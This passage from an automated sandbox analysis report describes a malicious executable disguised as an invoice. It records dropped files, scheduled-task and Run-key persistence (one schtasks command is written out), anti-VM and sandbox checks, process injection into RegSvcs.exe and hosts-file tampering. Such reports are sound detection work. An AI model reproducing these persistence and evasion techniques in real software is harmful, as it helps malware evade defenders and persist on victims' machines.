            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114B7 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114BF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114A3 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11457 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11473 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11467 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D1146B push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D1141B push es; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.770423052382821
            Source: initial sampleStatic PE information: section name: .text entropy: 7.770423052382821
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjSJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjSJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe TID: 5484Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 3636Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 4216Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9568
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 0000000E.00000002.551236469.00000000067C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6B6A0 LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107C008
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
